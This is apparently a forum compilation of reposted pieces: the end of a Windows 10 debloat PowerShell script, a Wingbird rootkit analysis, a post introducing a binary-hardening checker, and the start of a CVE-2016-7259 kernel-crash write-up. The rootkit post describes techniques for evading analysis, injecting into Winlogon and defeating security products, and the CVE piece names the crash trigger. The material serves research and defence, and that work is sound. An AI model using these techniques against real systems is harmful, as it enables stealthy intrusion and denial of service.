"HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" -Recurse -ErrorAction SilentlyContinue # Add Music icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{1CF1260C-4DD0-4ebb-811F-33C572699FDE}" # Remove Pictures icon from computer namespace # Write-Host "Removing Pictures icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" -Recurse -ErrorAction SilentlyContinue # Add Pictures icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA}" # Remove Videos icon from computer namespace # Write-Host "Removing Videos icon from computer namespace..." # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" -Recurse -ErrorAction SilentlyContinue # Add Videos icon to computer namespace # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}" # New-Item -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{A0953C92-50DC-43bf-BE83-3742FED03C9C}" ## Add secondary en-US keyboard #Write-Host "Adding secondary en-US keyboard..." #$langs = Get-WinUserLanguageList #$langs.Add("en-US") #Set-WinUserLanguageList $langs -Force # Remove secondary en-US keyboard # $langs = Get-WinUserLanguageList # Set-WinUserLanguageList ($langs | ? {$_.LanguageTag -ne "en-US"}) -Force ########## # Remove unwanted applications ########## # Disable OneDrive # Write-Host "Disabling OneDrive..." # If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive")) { # New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" | Out-Null # } # Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" -Name "DisableFileSyncNGSC" -Type DWord -Value 1 # Enable OneDrive # Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" -Name "DisableFileSyncNGSC" # Uninstall OneDrive # Write-Host "Uninstalling OneDrive..." # Stop-Process -Name OneDrive -ErrorAction SilentlyContinue # Start-Sleep -s 3 # $onedrive = "$env:SYSTEMROOT\SysWOW64\OneDriveSetup.exe" # If (!(Test-Path $onedrive)) { # $onedrive = "$env:SYSTEMROOT\System32\OneDriveSetup.exe" # } # Start-Process $onedrive "/uninstall" -NoNewWindow -Wait # Start-Sleep -s 3 # Stop-Process -Name explorer -ErrorAction SilentlyContinue # Start-Sleep -s 3 # Remove-Item "$env:USERPROFILE\OneDrive" -Force -Recurse -ErrorAction SilentlyContinue # Remove-Item "$env:LOCALAPPDATA\Microsoft\OneDrive" -Force -Recurse -ErrorAction SilentlyContinue # Remove-Item "$env:PROGRAMDATA\Microsoft OneDrive" -Force -Recurse -ErrorAction SilentlyContinue # If (Test-Path "$env:SYSTEMDRIVE\OneDriveTemp") { # Remove-Item "$env:SYSTEMDRIVE\OneDriveTemp" -Force -Recurse -ErrorAction SilentlyContinue # } # If (!(Test-Path "HKCR:")) { # New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null # } # Remove-Item -Path "HKCR:\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" -Recurse -ErrorAction SilentlyContinue # Remove-Item -Path "HKCR:\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" -Recurse -ErrorAction SilentlyContinue # Install OneDrive # $onedrive = "$env:SYSTEMROOT\SysWOW64\OneDriveSetup.exe" # If (!(Test-Path $onedrive)) { # $onedrive = "$env:SYSTEMROOT\System32\OneDriveSetup.exe" # } # Start-Process $onedrive -NoNewWindow # Uninstall default bloatware Write-Host "Uninstalling default bloatware..." # Get-AppxPackage "Microsoft.3DBuilder" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingFinance" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingNews" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingSports" | Remove-AppxPackage # Get-AppxPackage "Microsoft.BingWeather" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Getstarted" | Remove-AppxPackage # Get-AppxPackage "Microsoft.MicrosoftOfficeHub" | Remove-AppxPackage # Get-AppxPackage "Microsoft.MicrosoftSolitaireCollection" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Office.OneNote" | Remove-AppxPackage # Get-AppxPackage "Microsoft.People" | Remove-AppxPackage # Get-AppxPackage "Microsoft.SkypeApp" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Windows.Photos" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsAlarms" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsCamera" | Remove-AppxPackage # Get-AppxPackage "microsoft.windowscommunicationsapps" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsMaps" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsPhone" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsSoundRecorder" | Remove-AppxPackage # Get-AppxPackage "Microsoft.XboxApp" | Remove-AppxPackage # Get-AppxPackage "Microsoft.ZuneMusic" | Remove-AppxPackage # Get-AppxPackage "Microsoft.ZuneVideo" | Remove-AppxPackage # Get-AppxPackage "Microsoft.AppConnector" | Remove-AppxPackage # Get-AppxPackage "Microsoft.ConnectivityStore" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Office.Sway" | Remove-AppxPackage # Get-AppxPackage "Microsoft.Messaging" | Remove-AppxPackage # Get-AppxPackage "Microsoft.CommsPhone" | Remove-AppxPackage Get-AppxPackage "9E2F88E3.Twitter" | Remove-AppxPackage Get-AppxPackage "king.com.CandyCrushSodaSaga" | Remove-AppxPackage Get-AppxPackage "4DF9E0F8.Netflix" | Remove-AppxPackage # Get-AppxPackage "Drawboard.DrawboardPDF" | Remove-AppxPackage # Get-AppxPackage "Microsoft.MicrosoftStickyNotes" | Remove-AppxPackage # Get-AppxPackage "Microsoft.OneConnect" | Remove-AppxPackage Get-AppxPackage "D52A8D61.FarmVille2CountryEscape" | Remove-AppxPackage Get-AppxPackage "GAMELOFTSA.Asphalt8Airborne" | Remove-AppxPackage # Get-AppxPackage "Microsoft.WindowsFeedbackHub" | Remove-AppxPackage # Install default Microsoft applications # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.3DBuilder").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingFinance").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingNews").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingSports").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.BingWeather").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Getstarted").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.MicrosoftOfficeHub").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.MicrosoftSolitaireCollection").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Office.OneNote").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.People").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.SkypeApp").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Windows.Photos").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsAlarms").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsCamera").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.windowscommunicationsapps").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsMaps").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsPhone").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsSoundRecorder").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.XboxApp").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.ZuneMusic").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.ZuneVideo").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.AppConnector").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.ConnectivityStore").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Office.Sway").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.Messaging").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.CommsPhone").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "9E2F88E3.Twitter").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "king.com.CandyCrushSodaSaga").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "4DF9E0F8.Netflix").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Drawboard.DrawboardPDF").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.MicrosoftStickyNotes").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.OneConnect").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "D52A8D61.FarmVille2CountryEscape").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "GAMELOFTSA.Asphalt8Airborne").InstallLocation)\AppXManifest.xml" # Add-AppxPackage -DisableDevelopmentMode -Register "$($(Get-AppXPackage -AllUsers "Microsoft.WindowsFeedbackHub").InstallLocation)\AppXManifest.xml" # In case you have removed them for good, you can try to restore the files using installation medium as follows # New-Item C:\Mnt -Type Directory | Out-Null # dism /Mount-Image /ImageFile:D:\sources\install.wim /index:1 /ReadOnly /MountDir:C:\Mnt # robocopy /S /SEC /R:0 "C:\Mnt\Program Files\WindowsApps" "C:\Program Files\WindowsApps" # dism /Unmount-Image /Discard /MountDir:C:\Mnt # Remove-Item -Path C:\Mnt -Recurse # Disable Xbox DVR # If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR")) { # New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR" | Out-Null # } # Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR" -Name "AllowGameDVR" -Type DWord -Value 0 # Enable Xbox DVR # Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\GameDVR" -Name "AllowGameDVR" -ErrorAction SilentlyContinue # Uninstall Windows Media Player # Write-Host "Uninstalling Windows Media Player..." # dism /online /Disable-Feature /FeatureName:MediaPlayback /Quiet /NoRestart # Install Windows Media Player # dism /online /Enable-Feature /FeatureName:MediaPlayback /Quiet /NoRestart # Uninstall Work Folders Client # Write-Host "Uninstalling Work Folders Client..." # dism /online /Disable-Feature /FeatureName:WorkFolders-Client /Quiet /NoRestart # Install Work Folders Client # dism /online /Enable-Feature /FeatureName:WorkFolders-Client /Quiet /NoRestart # Set Photo Viewer as default for bmp, gif, jpg and png Write-Host "Setting Photo Viewer as default for bmp, gif, jpg, png and tif..." If (!(Test-Path "HKCR:")) { New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null } ForEach ($type in @("Paint.Picture", "giffile", "jpegfile", "pngfile")) { New-Item -Path $("HKCR:\$type\shell\open") -Force | Out-Null New-Item -Path $("HKCR:\$type\shell\open\command") | Out-Null Set-ItemProperty -Path $("HKCR:\$type\shell\open") -Name "MuiVerb" -Type ExpandString -Value "@%ProgramFiles%\Windows Photo Viewer\photoviewer.dll,-3043" Set-ItemProperty -Path $("HKCR:\$type\shell\open\command") -Name "(Default)" -Type ExpandString -Value "%SystemRoot%\System32\rundll32.exe `"%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll`", ImageView_Fullscreen %1" } # Remove or reset default open action for bmp, gif, jpg and png # If (!(Test-Path "HKCR:")) { # New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null # } # Remove-Item -Path "HKCR:\Paint.Picture\shell\open" -Recurse # Remove-ItemProperty -Path "HKCR:\giffile\shell\open" -Name "MuiVerb" # Set-ItemProperty -Path "HKCR:\giffile\shell\open" -Name "CommandId" -Type String -Value "IE.File" # Set-ItemProperty -Path "HKCR:\giffile\shell\open\command" -Name "(Default)" -Type String -Value "`"$env:SystemDrive\Program Files\Internet Explorer\iexplore.exe`" %1" # Set-ItemProperty -Path "HKCR:\giffile\shell\open\command" -Name "DelegateExecute" -Type String -Value "{17FE9752-0B5A-4665-84CD-569794602F5C}" # Remove-Item -Path "HKCR:\jpegfile\shell\open" -Recurse # Remove-Item -Path "HKCR:\pngfile\shell\open" -Recurse # Show Photo Viewer in "Open with..." Write-Host "Showing Photo Viewer in `"Open with...`"" If (!(Test-Path "HKCR:")) { New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null } New-Item -Path "HKCR:\Applications\photoviewer.dll\shell\open\command" -Force | Out-Null New-Item -Path "HKCR:\Applications\photoviewer.dll\shell\open\DropTarget" -Force | Out-Null Set-ItemProperty -Path "HKCR:\Applications\photoviewer.dll\shell\open" -Name "MuiVerb" -Type String -Value "@photoviewer.dll,-3043" Set-ItemProperty -Path "HKCR:\Applications\photoviewer.dll\shell\open\command" -Name "(Default)" -Type ExpandString -Value "%SystemRoot%\System32\rundll32.exe `"%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll`", ImageView_Fullscreen %1" Set-ItemProperty -Path "HKCR:\Applications\photoviewer.dll\shell\open\DropTarget" -Name "Clsid" -Type String -Value "{FFE2A43C-56B9-4bf5-9A79-CC6D4285608A}" # Remove Photo Viewer from "Open with..." # If (!(Test-Path "HKCR:")) { # New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null # } # Remove-Item -Path "HKCR:\Applications\photoviewer.dll\shell\open" -Recurse # Enable F8 boot menu options # Write-Host "Enabling F8 boot menu options..." # bcdedit /set `{current`} bootmenupolicy Legacy | Out-Null # Disable F8 boot menu options # bcdedit /set `{current`} bootmenupolicy Standard | Out-Null ########## # Restart ########## Write-Host Write-Host "Press any key to restart your system..." -ForegroundColor Black -BackgroundColor White $key = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") Write-Host "Restarting..." Restart-Computer Sursa: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1

Wingbird rootkit analysis In previous blog posts I've described rootkits that have been used by so-called state-sponsored actors for infecting their victims, providing malware persistence and achieving SYSTEM privileges into a system. I've mentioned Remsec (Cremes) rootkit that was used by Strider (ProjectSauron) cybergroup and Sednit rootkit of APT28 (Fancy Bear) group. While Remsec rootkit has been used by operators for executing its code in kernel mode with SMEP bypass and developed in its original style, Sednit authors developed rootkit to hide their malware activity and footprints from user eyes in "usual rootkit manner". Recently one security company that investigates activity of various cybergroups, has shared with me droppers of rootkits. I've been surprised during its analysis, because the rootkit is well protected from the analysis as well as its dropper. Analysis of both rootkits took enough time, because it contain various anti-research capabilities. Size of rootkit and dropper files was significantly increased due to using code obfuscation and the presence of much garbage instructions. Moreover, both rootkits belong to one cybergroup, were developed in targeted manner and are intended for specific victims. Concept of "targeted" already long time discussed in AVers & security community as attribute of sophisticated cyberattacks, which often have state-sponsored origins. In past we saw a lot of cyberespionage operations in which have been used unique executable files that were developed for specific victims and software they use. Described in this blog post pieces of malware satisfy all the requirements, which researchers impose to highly targeted cyberattacks and possibly state-sponsored origins. I'm sure that this malware is a part of larger cyberespionage platform. This malware as well as cyber espionage group, which leverages it, was mentioned by Microsoft MMPC in their blog post and Security Intelligence Report Volume 21 here. The group is called NEODYMIUM, while the malware is called Wingbird, Wingbird shares similarities with another famous commercial cyber espionage toolkit called Finfisher that detected by Symantec as Backdoor.Finfish. Dropper 1 First dropper has following characteristics. The dropper is well protected from various methods of static and dynamic analysis. It contains various anti- disasm/debug/VM/dump features. The dropper contains very obfuscated code with jumps to middle of instructions, garbage instructions, useless checks, useless jumps, etc. Because of using a lot of garbage instructions, size of dropper is large enough (1,3MB). The dropper is designed so that to delay its analysis as long as possible. It installs the rootkit into a system. It drops rootkit into file with name logonsrv.dat. It is intended only for rootkit dropping. High entropy level of .text section is an indicator that code is encrypted and obfuscated. The dropper and rootkit contain timestamp inside PE header that looks like legitimate. Typical end of function in dropper. All functions lead to one code. That is very obfuscated and contains useless jumps. Below are listed characteristics of Ring 0 rootkit. The rootkit code is very obfuscated, making its statical analysis almost impossible. The rootkit contains encrypted code and data inside. It does not create device object and does not communicate with Ring 3 code. It does not set any hooks in Windows kernel. It is intended only for hidden injection of malicious code into trusted Winlogon process. The rootkit creates its copy in allocated pool region that is also contains very obfuscated code. It uses self-modifying code, for example, it can modify important call or jmp instructions with another address or another register. It is designed to be hidden as far as it is possible and unloads its driver after code into Winlogon was injected. It checks presence of ESET Helper Driver (ehdrv.sys) in a system and removes its SSDT (KiServiceTable) hooks. Before doing main work, the rootkit prepares own code for execution. It allocates two non-paged buffers. One with size 0x56000 for its driver and second with size 0x10000. First buffer is used for storing newly created driver (in memory) that will do all necessary work and second buffer with some trampolines to NT kernel API. The rootkit builds its IAT with 0x2F items that are located into section of new driver. But instead of using this IAT directly, the rootkit code takes these addresses and uses it for modifying instructions and variables in the code from second pool region. It is worth to note that authors of rootkit took all possible steps to make rootkit analysis in memory much complicated. Advanced users also will have troubles with its detection via anti-rootkit tools. The rootkit does not use its original image logonsrv.dat for performing main malicious tasks. The rootkit does not rely on continuous IAT buffer in memory that can be used to simplify its analysis. The rootkit does it main work from two allocated memory (pool) blocks with self-modifying code. One of these blocks is used as special trampoline for NT kernel API calls. It uses KeDelayExecutionThread function before doing main work, i. e. before injection code into Winlogon. Below you can see code from second allocated buffer with size 0x10000 that contains trampolines to imported by rootkit NT API. Another code from created driver (from first buffer) rewrites instructions in these trampolines with addresses from IAT. After the end of preliminary actions, the rootkit calls ZwOpenKey for opening its registry key and reads value of ImagePathparameter with help of ZwQueryValueKey. Between two calls rootkit modifies own instructions as shown below. After calling ZwQueryValueKey, the code has been modified again for calling PsCreateSystemThread. The rootkit creates two threads with PsCreateSystemThread API and one of them is used for performing main malicious work. Below you can see the scheme of rootkit execution. It prepares code that will be injected into Winlogon and reads \KnownDlls\ntdll.dll section that represents content of Ntdll library for easy access. The rootkit also imports KeServiceDescriptorTable variable for getting address of KiServiceTable and restore items in this table. It seems only one function in rootkit body was not obfuscated. This function specializes in enumeration of system modules. The rootkit code calls it several times, for getting NT kernel base address, Ntdll base address and for checking presence of ESET helper driver (ehdrv.sys). As you can see above, authors take interest in NT kernel files, because they need to restore original SSDT functions. Interesting to note that authors have been used same scheme for obfuscating rootkit driver like they did in case of dropper. We can find same functions construction inside rootkit body. As you can see on image above, all functions again lead to one code that is obfuscated with garbage instructions. Also interesting that startup code in both dropper and driver didn't contain obfuscation. Considering above information and this fact, it seems that for obfuscation driver and dropper has been used one tool that launches process of obfuscation before compiler will generate code. i. e. on source code level. The rootkit allocates three buffers into Winlogon process. First with size 0x100000, second 0x3000 and third 0x48000. The following Ntoskrnl functions are used by the rootkit. Dropper 2 Next characteristics are related to second dropper. Like first dropper, this dropper is well protected from various methods of static and dynamic analysis. The dropper has same size 1.3MB. The dropper drops Ring 0 rootkit into a file with name ndisclient.dat. Some information about dropper behaviour. Some characteristics of driver. Designed to communicate with user mode client with help of device \Device\PhysicalDrive00 and symbolic link to it \DosDevices\PhysicalDrive00. It has a smaller size than driver from first dropper (43 KB vs 372 KB). It registers three IRP dispatch entry points for IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL requests. The rootkit checks presence of driver \Driver\diskpt (Shadow Defender shadowdefender.com) and \Driver\DfDiskLowDfDiskLow.sys (Deep Freeze Faronics Corp). It contains code for parse object manager name space via functions ZwOpenDirectoryObject, ObQueryNameString. It contains obfuscated, self-modificated code that is hard for both static and dynamic analysis. Authors have provided DriverUnload function. The rootkit is intended for FS sandbox bypassing and for modifying files directly on low hard disk level. The rootkit allocates pool block in DriverEntry that is used for already familiar to us trampoline to NT kernel API (like in first driver). Below you can see image with major steps of execution flow of rootkit's DriverEntry. Part of IRP_MJ_DEVICE_CONTROL handler code is presented below. The rootkit code in DriverEntry retrieves pointer to device object that represents hard disk(s) by port-driver (atapi). This information is used subsequently in code that dispatches IRP_MJ_DEVICE_CONTROL operation for sending synchronous requests to port-driver with standart set of functions: MmMapLockedPagesSpecifyCache, IoAllocateMdl for work with non-paged memory and direct I/O. IoBuildSynchronousFsdRequest, IofCallDriver to build a correponding IRP and send it to driver. MmUnmapLockedPages, IoFreeMdl for releasing resources. Below you can see table with characteristics of both analyzed drivers. Conclusion Authors of this malware took almost all efforts to hamper both the static and dynamic analysis. The first rootkit serves only for one purpose - to inject malicious code into Winlogon system process. It checks presence of ESET Helper Driver due to it ability to block rootkit malicious actions and attackers seems sure that their victim uses this security product. As you can see from the analysis due to high level of code obfuscation, it is useless to show images of rootkit code, because it do not help for building logic of its execution. Malware authors have used special instrument for droppers and rootkits obfuscation. It's not clear, why attackers did not care about rootkit persistence into a system and why it not guards own registry key. Both rootkits are targeted on executing only one specific task: first is used for data/code injection into Winlogon and second to communicate with hard drive on low level. The rootkit from second dropper doesn't care about own persistence: the dropper removes its driver from disk once it was loaded into memory. It is worth to note that checking of presence of specific security products are correspond with the goals of both rootkits. For example, first driver checks presence of AV driver, when second driver is targeted only on system utilities that specialize on guarding a system from critical modifications. Both security/system products Shadow Defender and Faronics Deep Freeze to leverage FS sandbox methods for blocking potential malicious actions for protected files in a system. This is an answer why attackers need low level disk access - they need to bypass FS sandbox and modify required files directly. Posted Yesterday by Artem Sursa: https://artemonsecurity.blogspot.ro/2017/01/wingbird-rootkit-analysis.html

Introducing Serene 2016.12.22 Windows Defender checked with Serene I use a number of mountaineering references here on Summit Route, much to everyone's confusion. Mountaineering, like information security, involves risk management and the application of best practices to reduce the inherent risks. Rock climbing is one aspect of mountaineering, and it requires you to secure your ropes to an anchor (ex. a tree, crack, or rock feature). The acronym SERENE is used as a checklist to review your anchor. The anchor needs to be Solid, Equalized, Redundant, Efficient, and No Extension (SERENE). This doesn't check the quality of the rope, your harness, the weather, your current physical state, or many other things that will affect your safety, but it's a simple series of checks for one thing that ensures you're applying best practices. SERENE anchor from wikipedia Similarly, I built a tool call that I call Serene to perform a couple of best practice checks on executable binaries. It's not an acronym, because there is nothing for you to remember, as it does the work for you. When a Windows executable, such as a .exe or .dll (a PE file), or an Apple mach-o file is compiled, there are a few settings that can improve its security. These include: DEP/NX: Denies execution on the stack. ASLR/PIE: Loads the binary into a random place in memory. CFG (Windows only): Restricts what execution paths can be taken. x64: Allows a 64-bit memory space to be used for ASLR/PIE. Serene is a simple static web app (meaning no backend server, it's just a javascript file that runs locally). You can drag and drop files or folders to it and it will identify the executable binaries, perform its checks, and display the results. I do not collect copies of files, but I still advise that you should not drag and drop sensitive files to sites no matter what their stated policies are. My primary use case for making Serene is when I evaluate products at the company I work at. I want to get an idea of the software development practices, so this tool gives me some quick insight into that. Examples Windows Defender Microsoft's Windows Defender, the default AV for Windows, can be dragged and dropped to Serene by using the folder C:\Program Files\Windows Defender\, resulting in: Windows Defender As you can see it follows all the best practices that Serene checks for. This also shows how Serene tells you that DEP is not applicable (N/A) to these files because all 64-bit processes have DEP applied by default. Furthermore, Windows Defender includes a number of MUI files which do not include code and therefore don't play into the security of the applications, so they are ignored. Google Chrome on macOS Google Chrome on macOS can be analyzed by dragging and dropping the Google Chrome icon in the Applications directory, which ends up being a .app file containing the executables. Google Chrome on macOS As you can see this time I show NX and PIE which are the equivalents of DEP and ASLR on Windows, and don't show CFG, which has no relevance to macOS. Only some install files are missing PIE and 32-bit, so it's not too worrying. Checking files without Serene Serene makes it easy to check files, but you might want to to this via the command-line. You may also just want to double-check my work. To perform the same checks as Serene, using the official tools, do one of the following: Windows executables Windows executables are PE files and can be checked using the Visual Studio tool dumpbin. Run dumpbin /headers yourfile.exe First look at FILE HEADER VALUES for the machine to determine if it is 64-bit or 32-bit. Next, look in the OPTIONAL HEADER VALUES for the Dll Characteristics section for the phrases Dynamic base (ASLR), NX compatible (DEP), and Guard (CFG). Using dumpbin to perform the same checks as Serene macOS executables To manually check macOS mach-o files, use the XCode tool otool. Run otool -hv yourfile. First look at the cputype to see if it is X86_64 to determine if it is 64-bit. Next check the flags to see if it contains PIE. Determining if it has NX is identified by the lack of MH_ALLOW_STACK_EXECUTION (probably called something else, as I just check for that bit in the binary and don't know what the tool calls it). Using otool to perform the same checks as Serene Known limitations On macOS, I don't currently handle mach-o files containing multiple architectures, which is an admittedly large limitation. I also do not yet support ELF files, which I hope to one day handle. It only works with x86 and x86-64 executables, not ARM. Anything compiled with Golang will not have ASLR/PIE. This is a decision by the language creators as Golang is a secure language, but if the process imports a C library, it exposes itself to possible issues. As such, I didn't want to skip Golang binaries. On Windows, an executable can enable DEP without it being compiled into the binary. If you don't have permissions to read a file, Serene may lock up and you'll need to refresh the page. Finally, there are all sorts of ways an application can be insecure or more secure than Serene shows. This is only identifying one set of features. Other comments This is really just some improvements to a project of mine from 2012 called SlopFinder. Sursa: https://summitroute.com/blog/2016/12/22/introducing_serene/

CVE-2016-7259: An empty file into the blue Date Wed 14 December 2016 By Sebastien Renaud A binary analysis of CVE-2016-7259: A win32k kernel bug. Forewords The vulnerability was found by one of our fuzzers in 2015 (made by Richard) and analyzed later by me (Sebastien). The vulnerability deals with *.pfm and *.pfb files (strangely enough, not their format per se): Printer Font Metric (PFM) is a binary version of AFM (Adobe Font Metrics). It contains font metric information. Printer Font Binary (PFB) is a binary PostScript font format created by Adobe Systems. It contains a font's glyph data. Vulnerability Description A crash in the Windows windowing kernel graphic component (win32k.sys) happens when a specially crafted PostScript Type 1 font (*.pfm) font file is loaded. The crash is due to Windows OS not properly checking that the size of the related *.pfb file size is 0. Simply put: having an empty *.pfb file crashes the system. Stack Trace (See version_information section for software version information) Information and stack trace at time of crash with public Microsoft symbols: ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 1E, {c0000005, 8e3c7280, 0, 18} *** WARNING: Unable to verify checksum 